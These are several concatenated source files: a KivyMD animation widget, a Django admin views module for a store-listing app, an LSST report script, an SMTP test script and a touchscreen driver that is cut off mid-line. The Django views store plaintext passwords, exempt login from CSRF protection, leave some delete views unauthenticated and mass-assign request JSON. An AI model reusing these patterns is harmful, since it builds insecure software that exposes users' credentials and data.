= 0\n\n def animation_to_bottom(self):\n Animation(y=self._scroll_y, d=0.4, t=\"in_out_cubic\").start(\n self._obj_scroll\n )\n Animation(y=self._user_name_y, d=0.5, x=dp(15), t=\"in_out_cubic\").start(\n self._obj_user_name\n )\n Animation(font_size=sp(36), d=0.3, t=\"in_out_cubic\").start(\n self._obj_user_name\n )\n Animation(_primary_color=[0, 0, 0, 0], d=0.3, t=\"in_out_cubic\").start(\n self.user_animation_card\n )\n Animation(y=self._avatar_y, d=0.4, t=\"in_out_cubic\").start(\n self._obj_avatar\n )\n\n def animation_to_top(self):\n user_name_y = (\n Window.height\n - self._obj_toolbar.height\n + (self.theme_cls.standard_increment // 2 - dp(12))\n )\n user_name_x = self.theme_cls.horizontal_margins + dp(12) * 
5\n\n Animation(y=-self._obj_toolbar.height, d=0.4, t=\"in_out_cubic\").start(\n self._obj_scroll\n )\n Animation(y=user_name_y, d=0.3, x=user_name_x, t=\"in_out_cubic\").start(\n self._obj_user_name\n )\n Animation(font_size=sp(20), d=0.3, t=\"in_out_cubic\").start(\n self._obj_user_name\n )\n Animation(\n _primary_color=self.theme_cls.primary_color, d=0.3, t=\"in_out_cubic\"\n ).start(self.user_animation_card)\n Animation(y=self._obj_avatar.y + 30, d=0.4, t=\"in_out_cubic\").start(\n self._obj_avatar\n )\n\n\nclass UserAnimationCard(ThemableBehavior, FloatLayout):\n user_name = StringProperty()\n path_to_avatar = StringProperty()\n _callback_back = ObjectProperty()\n _primary_color = ListProperty()\n\n\nclass ModifiedToolbar(\n ThemableBehavior, SpecificBackgroundColorBehavior, BoxLayout\n):\n left_action_items = ListProperty()\n title = StringProperty()\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.bind(specific_text_color=self.update_action_bar_text_colors)\n Clock.schedule_once(\n lambda x: self.on_left_action_items(0, self.left_action_items)\n )\n\n def on_left_action_items(self, instance, value):\n self.update_action_bar(self.ids[\"left_actions\"], value)\n\n def update_action_bar(self, action_bar, action_bar_items):\n action_bar.clear_widgets()\n new_width = 0\n for item in action_bar_items:\n new_width += dp(48)\n action_bar.add_widget(\n MDIconButton(\n icon=item[0],\n on_release=item[1],\n opposite_colors=True,\n text_color=self.specific_text_color,\n theme_text_color=\"Custom\",\n )\n )\n action_bar.width = new_width\n\n def update_action_bar_text_colors(self, instance, value):\n for child in self.ids[\"left_actions\"].children:\n child.text_color = self.specific_text_color\n","sub_path":"kivymd/uix/useranimationcard.py","file_name":"useranimationcard.py","file_ext":"py","file_size_in_byte":10876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"626780877","text":"from django.contrib.auth.models import User, Group\nfrom django.contrib.auth.hashers import make_password\nfrom rest_framework import authentication, permissions\nfrom rest_framework import viewsets\nfrom rest_framework import status\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework.decorators import api_view\nfrom rest_framework.views import APIView\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse, HttpResponseRedirect\nfrom rest_framework.response import Response\nfrom django.contrib.auth import login as do_login\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import logout\nfrom rest_framework.permissions import IsAuthenticated\nfrom django.contrib.auth.views import PasswordResetView, PasswordResetDoneView, PasswordResetConfirmView, PasswordResetCompleteView\nfrom django.contrib import messages #import messages\nfrom .serializers import *\nfrom .models import *\nfrom django.db.models import F\nfrom django.contrib.auth.hashers import make_password\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.views.decorators.http import require_http_methods\nfrom django.http import HttpResponse,HttpResponseBadRequest\nfrom django.core import serializers\nimport json\nfrom 
fcm_django.models import FCMDevice\n\n\n\n#from .serializers import UserSerializer, GroupSerializer,TCategoriaSerializer,TComentarioSerializer,TEscaneosSerializer,TFavoritoSerializer,TGaleriaSerializer,TLocalSerializer,TNotificacionesSerializer,TPermisoSerializer,TRolSerializer,TRolpermisoSerializer,TTelefonoSerializer,TUsuarioSerializer\n#from .models import Categoria,Comentario,Escaneos,Favorito,Galeria,Local,Notificaciones,Permiso,Rol,Rolpermiso,Telefono,User\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass CategoriaViewSet(viewsets.ModelViewSet):\n queryset = Categoria.objects.all()\n serializer_class = TCategoriaSerializer\n\n\nclass ComentarioViewSet(viewsets.ModelViewSet):\n queryset = Comentario.objects.all()\n serializer_class = TComentarioSerializer\n\n\nclass EscaneosViewSet(viewsets.ModelViewSet):\n queryset = Escaneos.objects.all()\n serializer_class = TEscaneosSerializer\n\n\nclass FavoritoViewSet(viewsets.ModelViewSet):\n queryset = Favorito.objects.all()\n serializer_class = TFavoritoSerializer\n\n\nclass GaleriaViewSet(viewsets.ModelViewSet):\n queryset = Galeria.objects.all()\n serializer_class = TGaleriaSerializer\n\n\nclass LocalViewSet(viewsets.ModelViewSet):\n queryset = Local.objects.all()\n serializer_class = TLocalSerializer\n\n\nclass NotificacionesViewSet(viewsets.ModelViewSet):\n queryset = Notificaciones.objects.all()\n serializer_class = TNotificacionesSerializer\n\n\nclass PermisoViewSet(viewsets.ModelViewSet):\n queryset = Permiso.objects.all()\n serializer_class = TPermisoSerializer\n\n\nclass RolViewSet(viewsets.ModelViewSet):\n queryset = Rol.objects.all()\n serializer_class = TRolSerializer\n\n\nclass RolpermisoViewSet(viewsets.ModelViewSet):\n queryset = Rolpermiso.objects.all()\n serializer_class = TRolpermisoSerializer\n\n\nclass TelefonoViewSet(viewsets.ModelViewSet):\n queryset = Telefono.objects.all()\n serializer_class = TTelefonoSerializer\n\n\nclass UsuarioViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = TUsuarioSerializer\n\nclass UsuarioAPPViewSet(viewsets.ModelViewSet):\n queryset = UserAPP.objects.all()\n serializer_class = TUsuarioAPPSerializer\n\n\nclass PublicidadViewSet(viewsets.ModelViewSet):\n queryset = Publicidad.objects.all()\n serializer_class = TPublicidadSerializer\n\n\ndef index(request):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user)\n return render(request, 'productos/index.html',{'permisos': lpermisos})\n\n\ndef tablaUsuario(request):\n #obtener permisos en base al rol anteriro\n lpermisos = obtenerPermisos(request.user)\n user = User.objects.all()\n contexto = {'usuarios': user ,'permisos': lpermisos }\n return render(request, 'productos/tablaUsuario.html', contexto)\n\n\ndef tablaLocal(request):\n #obtener permisos en base al rol anteriro\n lpermisos = obtenerPermisos(request.user)\n local = Local.objects.all() \n contexto = {'locales': local,'permisos': lpermisos }\n return render(request, 'productos/tablaLocal.html', contexto)\n\n\ndef tableCategoria(request):\n #obtener permisos en base al rol anteriro \n lpermisos = obtenerPermisos(request.user)\n categoria = 
def tableCategoria(request):\n    # look up the permissions granted by this user's role\n    lpermisos = obtenerPermisos(request.user)\n    categoria = Categoria.objects.all()\n    contexto = {'categorias': categoria,'permisos': lpermisos }\n    return render(request, 'productos/tablaCategoria.html', contexto)\n\n\ndef tableFavorito(request):\n    # look up the permissions granted by this user's role\n    lpermisos = obtenerPermisos(request.user)\n    favorito = Favorito.objects.all()\n    contexto = {'favoritos': favorito,'permisos': lpermisos}\n    return render(request, 'productos/tablaFavorito.html', contexto)\n\n\ndef tableTelefono(request):\n    # look up the permissions granted by this user's role\n    lpermisos = obtenerPermisos(request.user)\n    telefono = Telefono.objects.all()\n    contexto = {'telefonos': telefono,'permisos': lpermisos }\n    return render(request, 'productos/tablaTelefono.html', contexto)\n\n\ndef tableGaleria(request):\n    lpermisos = obtenerPermisos(request.user)\n    galeria = Galeria.objects.all()\n    contexto = {'galerias': galeria ,'permisos': lpermisos}\n    return render(request, 'productos/tablaGaleria.html', contexto)\n\n\ndef tableGaleria2(request):\n    # look up the permissions granted by this user's role\n    lpermisos = obtenerPermisos(request.user)\n    locales = []\n    user = User.objects.filter(email=request.user).first()\n    local = Local.objects.filter(adminLocal=user).all()  # which stores does this user manage\n    for i in local:\n        if i.id_local not in locales:\n            locales.append(i.id_local)\n    galeria = Galeria.objects.filter(id_local__in=locales)\n    contexto = {'galerias': galeria,'permisos': lpermisos}\n    return render(request, 'productos/tablaGaleria2.html', contexto)\n\n\ndef notificaciones(request):\n    # look up the permissions granted by this user's role\n    lpermisos = obtenerPermisos(request.user)\n    notificacion = Notificaciones.objects.all()\n    contexto = {'notificaciones': notificacion,'permisos': lpermisos}\n    return render(request, 'productos/notificaciones.html', contexto)\n\n\ndef localDelete(request):\n    # look up the permissions granted by this user's role\n    lpermisos = obtenerPermisos(request.user)\n    if request.method == \"POST\":\n        local = Local.objects.get(id_local=request.POST.get('local'))\n        local.delete()\n    return render(request, 'productos/tablaLocal.html', {\"locales\": Local.objects.all(),'permisos': lpermisos})\n\n\ndef categoriaDelete(request, id_categoria):\n    # look up the permissions granted by this user's role\n    lpermisos = obtenerPermisos(request.user)\n    categoria = Categoria.objects.get(id_categoria=id_categoria)\n    categoria.delete()\n    return render(request, 'productos/tablaCategoria.html', {\"categorias\": Categoria.objects.all(),'permisos': lpermisos})\n\n\ndef favoritoDelete(request, id_favorito):\n    # look up the permissions granted by this user's role\n    lpermisos = obtenerPermisos(request.user)\n    favorito = Favorito.objects.get(id_favorito=id_favorito)\n    favorito.delete()\n    return render(request, 'productos/tablaFavorito.html', {\"favoritos\": Favorito.objects.all(),'permisos': lpermisos})\n\n\ndef telefonoDelete(request, id_telefono):\n    # look up the permissions granted by this user's role\n    lpermisos = obtenerPermisos(request.user)\n    telefono = Telefono.objects.get(id_telefono=id_telefono)\n    telefono.delete()\n    return render(request, 'productos/tablaTelefono.html', {\"telefonos\": Telefono.objects.all(),'permisos': lpermisos})\n\n\ndef galeriaDelete(request, id_contenido):\n    # look up the permissions granted by this user's role\n    lpermisos = obtenerPermisos(request.user)\n    galeria = Galeria.objects.get(id_contenido=id_contenido)\n    galeria.delete()\n    return render(request, 'productos/tablaGaleria.html', {\"galerias\": Galeria.objects.all(),'permisos': lpermisos})\n# ...\n\n\n
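# login() below authenticates by hand with AuthenticationForm + authenticate();\n# Django's built-in LoginView implements the same flow.\n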
@csrf_exempt\ndef login(request):\n    form = AuthenticationForm()\n    if request.method == \"POST\":\n        form = AuthenticationForm(data=request.POST)\n        if form.is_valid():\n            username = form.cleaned_data['username']\n            password = form.cleaned_data['password']\n            user = authenticate(username=username, password=password)\n            print(\"verifying credentials\")\n            if user is not None:\n                do_login(request, user)\n                print(\"user exists\")\n                return redirect(\"/tablaLocal\")\n        else:\n            print(form.is_valid())\n            print(\"Incorrect username or password\")\n            return render(request, \"productos/login.html\", {'form': form, 'mensaje': \"Usuario o contraseña incorrecta.\"})\n\n    # if we reach this point, render the (empty) form again\n    return render(request, \"productos/login.html\", {'form': form, 'mensaje': \"\"})\n\ndef obtenerPermisos(user):\n    rol = User.objects.all().select_related('id_rol').filter(email=user).values('id_rol')[0]['id_rol']\n    dic = Rolpermiso.objects.all().filter(id_rol=rol).values(permiso=F('id_permiso__id_permiso'))\n    l = []\n    for i in dic:\n        if i[\"permiso\"] not in l:\n            l.append(i[\"permiso\"])\n    return l\n\n@login_required(login_url='/')\ndef logout_view(request):\n    logout(request)\n    return redirect('/')\n\n\n@login_required(login_url='/')\ndef registrarCategoria(request):\n    if request.method == 'POST':\n        if(request.POST.get(\"tipo\") != None and request.POST.get(\"descripcion\") != None):\n            categoria = Categoria(tipo=request.POST.get(\n                \"tipo\"), descripcion=request.POST.get(\"descripcion\"))\n            categoria.save()\n            # return HttpResponse(status=200)\n            return redirect(tableCategoria)\n        return HttpResponse(status=404)\n    if request.method == 'GET':\n        lpermisos = obtenerPermisos(request.user)\n        return render(request, 'productos/crear/crearCategoria.html',{'permisos': lpermisos})\n\n\n@login_required(login_url='/')\ndef registrarLocal(request):\n    if request.method == 'POST':\n        imagen = request.FILES.get('imagen')\n        if imagen != None:\n            if( request.POST.get(\"slogan\") != None and request.POST.get(\"latitud\") != None and request.POST.get(\"longitud\") != None and request.POST.get(\"direccion\") != None and request.POST.get(\"nombrec\") != None and request.POST.get(\"descripcion\") != None):\n                categoria = Categoria.objects.filter(id_categoria=request.POST.get(\"categoria\")).first()\n                local = Local(latitud=request.POST.get(\"latitud\"), estrellas=0, longitud=request.POST.get(\"longitud\"), slogan=request.POST.get(\"slogan\"), vistas=\n                0, descripcion=request.POST.get(\"descripcion\"), likes=0, direccion=request.POST.get(\"direccion\"), nombre_comercial=request.POST.get(\"nombrec\"), src_logo=request.FILES['imagen'],categoria=categoria)\n                local.save()\n                # return HttpResponse(status=200)\n                #return render(request, 'productos/crear/crearLocal.html',{'permisos': lpermisos })\n        else:\n            if(request.POST.get(\"estrella\") != None and request.POST.get(\"slogan\") != None and request.POST.get(\"latitud\") != None and request.POST.get(\"longitud\") != None and request.POST.get(\"vista\") != None and request.POST.get(\"direccion\") != None and request.POST.get(\"nombrec\") != None and request.POST.get(\"like\") != None and request.POST.get(\"descripcion\") != None):\n                categoria = Categoria.objects.filter(id_categoria=request.POST.get(\"categoria\")).first()\n                local = Local(latitud=request.POST.get(\"latitud\"), estrellas=0, longitud=request.POST.get(\"longitud\"), slogan=request.POST.get(\"slogan\"), vistas=0\n                , descripcion=request.POST.get(\"descripcion\"), likes=0, direccion=request.POST.get(\"direccion\"), nombre_comercial=request.POST.get(\"nombrec\"),categoria=categoria)\n                
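# save the new store record built from the posted form fields\n                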
local.save()\n                # return HttpResponse(status=200)\n                #return render(request, 'productos/crear/crearLocal.html',{'permisos': lpermisos })\n        return redirect(tablaLocal)\n        #return HttpResponse(status=404)\n    if request.method == 'GET':\n        lpermisos = obtenerPermisos(request.user)\n        return render(request, 'productos/crear/crearLocal.html', {\"categorias\": Categoria.objects.all(),'permisos': lpermisos})\n\n\n@login_required(login_url='/')\ndef editarLocal(request):\n    if request.method == 'POST':\n        local = Local.objects.get(id_local=request.POST['local'])\n        if(request.POST['nombrec'] != None and request.POST['nombrec'] != ''):\n            local.nombre_comercial = request.POST['nombrec']\n        if(request.POST['descripcion'] != None and request.POST['descripcion'] != ''):\n            local.descripcion = request.POST['descripcion']\n        if(request.POST['like'] != None and request.POST['like'] != ''):\n            local.likes = request.POST['like']\n        if(request.POST['estrella'] != None and request.POST['estrella'] != ''):\n            local.estrellas = request.POST['estrella']\n        if(request.POST['vista'] != None and request.POST['vista'] != ''):\n            local.vistas = request.POST['vista']\n        if(request.POST['direccion'] != None and request.POST['direccion'] != ''):\n            local.direccion = request.POST['direccion']\n        if(request.POST['longitud'] != None and request.POST['longitud'] != ''):\n            local.longitud = request.POST['longitud']\n        if(request.POST['latitud'] != None and request.POST['latitud'] != ''):\n            local.latitud = request.POST['latitud']\n        if(request.POST['slogan'] != None and request.POST['slogan'] != ''):\n            local.slogan = request.POST['slogan']\n        imagen = request.FILES.get('imagen')\n        if(imagen!=None):\n            local.src_logo = request.FILES['imagen']\n        local.save()\n        # dispositivos=FCMDevice.objects.filter(active=True)\n        # dispositivos.send_message(\n        #     title=\"local se agrego\"+request.POST['nombrec'],\n        #     body=\"se ha agregado un local\"\n        # )\n        return redirect(tablaLocal)\n\n\n@login_required(login_url='/')\ndef registrarUsuario(request):\n    #lpermisos = obtenerPermisos(request.user)\n    print(request.method)\n\n    if request.method == 'POST':\n        src_imagen = request.FILES.get('imagen')\n        if src_imagen!=None:\n            if(request.POST.get(\"email\") != None and request.POST.get(\"nombre\") != None and request.POST.get(\"apellido\") != None and request.POST.get(\"contrasena\") != None and request.POST.get(\"telefono\") != None and request.FILES[\"imagen\"] != None):\n                rol = Rol.objects.all().filter(id_rol=request.POST.get(\"rol\")).first()\n                usuario = User(username=request.POST.get(\"email\").split('@')[0], email=request.POST.get(\"email\"), nombres=request.POST.get(\"nombre\"), first_name=request.POST.get(\"nombre\"), contrasena=request.POST.get(\n                    \"contrasena\"), password=make_password(request.POST.get(\"contrasena\")), telefono=request.POST.get(\"telefono\"), apellidos=request.POST.get(\"apellido\"), last_name=request.POST.get(\"apellido\"), src_imagen=request.FILES['imagen'],id_rol=rol)\n                usuario.save()\n                #return redirect(tablaUsuario)\n                # return HttpResponse(status=200)\n                #return render(request, 'productos/crear/crearUsuario.html',{'permisos': lpermisos })\n            else:\n                messages.warning(request, 'No se pudo registrar Usuario.')\n        else:\n            if(request.POST.get(\"email\") != None and request.POST.get(\"nombre\") != None and request.POST.get(\"apellido\") != None and request.POST.get(\"contrasena\") != None and request.POST.get(\"telefono\") != None ):\n                rol = Rol.objects.all().filter(id_rol=request.POST.get(\"rol\")).first()\n                
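# the username is derived from the email's local part; 'password' receives the\n                # hashed value while the plain text is also kept in the custom 'contrasena' field\n                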
usuario = User(username=request.POST.get(\"email\").split('@')[0], email=request.POST.get(\"email\"), nombres=request.POST.get(\"nombre\"), first_name=request.POST.get(\"nombre\"), contrasena=request.POST.get(\n                    \"contrasena\"), password=make_password(request.POST.get(\"contrasena\")), telefono=request.POST.get(\"telefono\"), apellidos=request.POST.get(\"apellido\"), last_name=request.POST.get(\"apellido\"),id_rol=rol)\n                usuario.save()\n            else:\n                messages.warning(request, 'No se pudo registrar Usuario.')\n        return redirect(tablaUsuario)\n\n    if request.method == 'GET':\n        lpermisos = obtenerPermisos(request.user)\n        return render(request, 'productos/crear/crearUsuario.html', {\"roles\": Rol.objects.all(), 'permisos': lpermisos})\n\n\n@login_required(login_url='/')\ndef editarUsuario(request):\n    if request.method == 'POST':\n        usuario = User.objects.get(email=request.POST['email'])\n        if(request.POST['email'] != None and request.POST['email'] != ''):\n            usuario.email = request.POST['email']\n        if(request.POST['nombres'] != None and request.POST['nombres'] != ''):\n            usuario.nombres = request.POST['nombres']\n        if(request.POST['apellidos'] != None and request.POST['apellidos'] != ''):\n            usuario.apellidos = request.POST['apellidos']\n        if(request.POST['contrasena'] != None and request.POST['contrasena'] != ''):\n            usuario.contrasena = request.POST['contrasena']\n        if(request.POST['telefono'] != None and request.POST['telefono'] != ''):\n            usuario.telefono = request.POST['telefono']\n        # if(request.POST['id_rol']!=None and request.POST['id_rol']!=''):\n        #     usuario.id_rol=rol\n        if(bool(request.FILES.get('imagen', False)) == True):\n            usuario.src_imagen = request.FILES['imagen']\n        usuario.save()\n    return redirect(tablaUsuario)\n    #return render(request, 'productos/tablaUsuario.html', {\"usuarios\": User.objects.all()})\n\n\n@login_required(login_url='/')\ndef usuarioDelete(request):\n    lpermisos = obtenerPermisos(request.user)\n    if request.method == \"POST\":\n        usuario = User.objects.get(email=request.POST.get('email'))\n        usuario.delete()\n    return render(request, 'productos/tablaUsuario.html', {\"usuarios\": User.objects.all() ,'permisos': lpermisos})\n\n@login_required(login_url='/')\ndef registrarPublicidad(request):\n    if request.method == 'POST':\n        if(request.POST.get(\"descripcion\") != None):\n            publicidad = Publicidad(tipo=request.POST.get(\"descripcion\"))\n            publicidad.save()\n            # return HttpResponse(status=200)\n            return render(request, 'productos/crear/crearPublicidad.html')\n        return HttpResponse(status=404)\n    if request.method == 'GET':\n        lpermisos = obtenerPermisos(request.user)\n        return render(request, 'productos/crear/crearPublicidad.html',{'permisos': lpermisos})\n\n@api_view([\"PUT\"])\n@csrf_exempt\ndef update_favorito(request, favorito_id):\n    user = request.user.id\n    payload = json.loads(request.body)\n    try:\n        favorito_item = Favorito.objects.filter(added_by=user, id=favorito_id)\n        # returns 1 or 0\n        favorito_item.update(**payload)\n        favorito = Favorito.objects.get(id=favorito_id)\n        serializer = TFavoritoSerializer(favorito)\n        return JsonResponse({'favorito': serializer.data}, safe=False, status=status.HTTP_200_OK)\n    except ObjectDoesNotExist as e:\n        return JsonResponse({'error': str(e)}, safe=False, status=status.HTTP_404_NOT_FOUND)\n    except Exception:\n        return JsonResponse({'error': 'Something terrible went wrong'}, safe=False, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n@login_required(login_url='/')\ndef registrarNotificaciones(request):\n    if request.method == 'POST':\n        if(request.POST.get(\"alcance\") != 
None and request.POST.get(\"notificacion\") != None):\n            notificacion = Notificaciones(alcance=request.POST.get(\n                \"alcance\"), notificacion=request.POST.get(\"notificacion\"))\n            notificacion.save()\n            # return HttpResponse(status=200)\n            return redirect(notificaciones)\n        return HttpResponse(status=404)\n    if request.method == 'GET':\n        lpermisos = obtenerPermisos(request.user)\n        return render(request, 'productos/crear/crearNotificacion.html',{'permisos': lpermisos})\n\n@csrf_exempt\n@require_http_methods(['POST'])\ndef guardar_token(request):\n    body=request.body.decode('utf-8')\n    bodyDict=json.loads(body)\n    token=bodyDict['token']\n    existe=FCMDevice.objects.filter(registration_id=token,active=True)\n    if len(existe)>0:\n        return HttpResponseBadRequest(json.dumps({'mensaje':'el token ya existe'}))\n    dispositivo=FCMDevice()\n    dispositivo.registration_id=token\n    dispositivo.active=True\n    # if the user is logged in, link the device to their account\n    if request.user.is_authenticated:\n        dispositivo.user=request.user\n    try:\n        dispositivo.save()\n        return HttpResponse(json.dumps({'mensaje':'token guardado correctamente'}))\n    except Exception:\n        return HttpResponseBadRequest(json.dumps({'mensaje':'no se ha podido guardar'}))","sub_path":"Admin-Backend/productos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"557414885","text":"#!/usr/bin/env python\nimport argparse\n\n# Main code now in lsst.verify; this version for backward-compatibility only.\nfrom lsst.verify.bin.jobReporter import main\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=('Produce a Job object which can either be used '\n                                                  'to build a local report or to ship to SQuaSH.'))\n    parser.add_argument('repository', type=str,\n                        help='Path to a valid gen3 repository')\n    parser.add_argument('collection', type=str,\n                        help='Collection to search for metric measurement values')\n    parser.add_argument('--metrics_package', type=str, default=\"validate_drp\",\n                        help='Name of metrics package to load, defaults to validate_drp.')\n    parser.add_argument('--spec', type=str, default=\"design\",\n                        help='Spec level to apply: minimum, design, or stretch')\n    parser.add_argument('--dataset_name', type=str, default=\"validation_data_hsc\",\n                        help='Name of the dataset for which the report is being generated. 
'\n 'Defaults to validation_data_hsc.')\n\n args = parser.parse_args()\n main(args.repository, args.collection, args.metrics_package, args.spec, args.dataset_name)\n","sub_path":"bin.src/make_job_document.py","file_name":"make_job_document.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"191324492","text":"# config:utf-8\n\nimport smtplib\nfrom email.mime.text import MIMEText\nimport datetime\n\njp=\"iso-2022-jp\"\nmessage=MIMEText(\"メール送信テスト\".encode(jp),\"plain\",jp,)\nfrom_address=\"test@aaa.bb\"\nto_address=\"nao.zima@gmail.com\"\n\nmessage[\"Subject\"]=\"件名\"\nmessage[\"From\"]=from_address\nmessage[\"To\"]=to_address\n\n\nserver=smtplib.SMTP('localhost')\nserver.send_message(message)\n","sub_path":"src/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"561835744","text":"# adapted from pimoroni evdev support for the 7 inch capacitive screen\n# added support for the resistive 3.5 and maybe others that doesn't depend upon SDL 1.2\nimport errno\nimport glob\nimport io\nimport os\nimport queue\nimport struct\nimport time\nfrom collections import namedtuple\nimport pygame\n\nimport select\n\nimport debug\n\nTOUCH_X = 0\nTOUCH_Y = 1\n\nTouchEvent = namedtuple('TouchEvent', ('timestamp', 'type', 'code', 'value'))\n\nEV_SYN = 0\nEV_ABS = 3\n\nABS_X = 0\nABS_Y = 1\n\nEV_KEY = 1\nBTN_TOUCH = 330\nABS_MT_SLOT = 0x2f # 47 MT slot being modified\nABS_MT_POSITION_X = 0x35 # 53 Center X of multi touch position\nABS_MT_POSITION_Y = 0x36 # 54 Center Y of multi touch position\nABS_MT_TRACKING_ID = 0x39 # 57 Unique ID of initiated contact\n\nTS_PRESS = 1\nTS_RELEASE = 0\nTS_MOVE = 2\n\n\nclass Touch(object):\n\tdef __init__(self, slot, x, y):\n\t\tself.slot = slot\n\n\t\tself._x = x\n\t\tself._y = y\n\t\tself.last_x = -1\n\t\tself.last_y = -1\n\n\t\tself._id = -1\n\t\tself.events = []\n\t\tself.on_move = None\n\t\tself.on_press = None\n\t\tself.on_release = None\n\n\t@property\n\tdef position(self):\n\t\treturn self.x, self.y\n\n\t@property\n\tdef last_position(self):\n\t\treturn self.last_x, self.last_y\n\n\t@property\n\tdef valid(self):\n\t\treturn self.id > -1\n\n\t@property\n\tdef id(self):\n\t\treturn self._id\n\n\t@id.setter\n\tdef id(self, value):\n\t\tif value != self._id:\n\t\t\tif value == -1 and not TS_RELEASE in self.events:\n\t\t\t\tself.events.append(TS_RELEASE)\n\t\t\telif not TS_PRESS in self.events:\n\t\t\t\tself.events.append(TS_PRESS)\n\n\t\tself._id = value\n\n\t@property\n\tdef x(self):\n\t\treturn self._x\n\n\t@x.setter\n\tdef x(self, value):\n\t\tif value != self._x and not TS_MOVE in self.events:\n\t\t\tself.events.append(TS_MOVE)\n\t\tself.last_x = self._x\n\t\tself._x = value\n\n\t@property\n\tdef y(self):\n\t\treturn self._y\n\n\t@y.setter\n\tdef y(self, value):\n\t\tif value != self._y and not TS_MOVE in self.events:\n\t\t\tself.events.append(TS_MOVE)\n\t\tself.last_y = self._y\n\t\tself._y = value\n\n\tdef handle_events(self):\n\t\t\"\"\"Run outstanding press/release/move events\"\"\"\n\t\tfor event in self.events:\n\t\t\tif event == TS_MOVE and callable(self.on_move):\n\t\t\t\tself.on_move(event, self)\n\t\t\tif event == TS_PRESS and callable(self.on_press):\n\t\t\t\tself.on_press(event, self)\n\t\t\tif event == TS_RELEASE and callable(self.on_release):\n\t\t\t\tself.on_release(event, self)\n\n\t\tself.events = []\n\n\nclass 
Touches(list):\n\t@property\n\tdef valid(self):\n\t\treturn [tch for tch in self if tch.valid]\n\n\nclass Touchscreen(object):\n\tTOUCHSCREEN_EVDEV_NAME = ('FT5406 memory based driver', 'Goodix Capactivie Touchscreen')\n\tTOUCHSCREEN_RESISTIVE = 'stmpe-ts'\n\tTOUCHSCREEN28CAP = 'EP0110M09'\n\tEVENT_FORMAT = str('llHHi')\n\tEVENT_SIZE = struct.calcsize(EVENT_FORMAT)\n\n\tdef __init__(self):\n\t\tself.touchdefs = {}\n\t\twith open('../touchdefinitions') as f:\n\t\t\tdefs = f.read().splitlines()\n\t\t\tfor l in defs:\n\t\t\t\ttouchitem = l.split('|')\n\t\t\t\tself.touchdefs[touchitem[0]] = touchitem[1:]\n\t\tprint(self.touchdefs)\n\t\tself._use_multitouch = True\n\t\tself.controller = \"unknown\"\n\t\tself._shiftx = 0\n\t\tself._shifty = 0\n\t\tself._flipx = 0 # 0 for ok else size of x from which to subtract touch value\n\t\tself._flipy = 0 # 0 for ok else size of y from which to subtract touch value\n\t\tself._scalex = 1.0\n\t\tself._scaley = 1.0\n\t\tself._capscreen = True\n\t\tself.a = None\n\t\tself._running = False\n\t\tself._thread = None\n\t\tself._f_poll = select.poll()\n\t\tself._f_device = io.open(self._touch_device(), 'rb', self.EVENT_SIZE)\n\t\tself._f_poll.register(self._f_device, select.POLLIN)\n\t\tself.position = Touch(0, 0, 0)\n\t\tself.touches = Touches([Touch(x, 0, 0) for x in range(10)])\n\t\tself._event_queue = queue.Queue()\n\t\tself._touch_slot = 0\n\n\tdef _run(self):\n\t\tself._running = True\n\t\twhile self._running:\n\t\t\tself.poll()\n\t\t\ttime.sleep(0.00001)\n\n\tdef run(self):\n\t\tself._run()\n\n\tdef stop(self):\n\t\tif self._thread is None:\n\t\t\treturn\n\n\t\tself._running = False\n\t\tself._thread.join()\n\t\tself._thread = None\n\n\t@property\n\tdef _current_touch(self):\n\t\treturn self.touches[self._touch_slot]\n\n\tdef close(self):\n\t\tself._f_device.close()\n\n\tdef __enter__(self):\n\t\treturn self\n\n\tdef __exit__(self, exc_type, exc_value, exc_tb):\n\t\tself.close()\n\n\tdef __iter__(self):\n\t\tpass\n\n\tdef _lazy_read(self):\n\t\twhile self._wait_for_events():\n\t\t\tevent = self._f_device.read(self.EVENT_SIZE)\n\t\t\tif not event:\n\t\t\t\tbreak\n\t\t\tyield event\n\n\tdef _get_pending_events(self):\n\t\tfor event in self._lazy_read():\n\t\t\t(tv_sec, tv_usec, ttype, code, value) = struct.unpack(self.EVENT_FORMAT, event)\n\t\t\tself._event_queue.put(TouchEvent(tv_sec + (tv_usec / 1000000), ttype, code, value))\n\n\tdef _wait_for_events(self, timeout=2):\n\t\treturn self._f_poll.poll(timeout)\n\n\tdef poll(self):\n\t\tself._get_pending_events()\n\n\t\twhile not self._event_queue.empty():\n\t\t\tevent = self._event_queue.get()\n\t\t\tdebug.debugPrint('LLTouch', 'Touch: ' + str(event))\n\t\t\tself._event_queue.task_done()\n\n\t\t\tif event.type == EV_SYN: # Sync\n\t\t\t\tfor tch in self.touches:\n\t\t\t\t\ttch.handle_events()\n\t\t\t\treturn self.touches\n\n\t\t\tif event.type == EV_KEY and not self._capscreen:\n\t\t\t\tif event.code == BTN_TOUCH:\n\t\t\t\t\tself._touch_slot = 0\n\t\t\t\t\t# self._current_touch.id = 1\n\t\t\t\t\tif self.a is 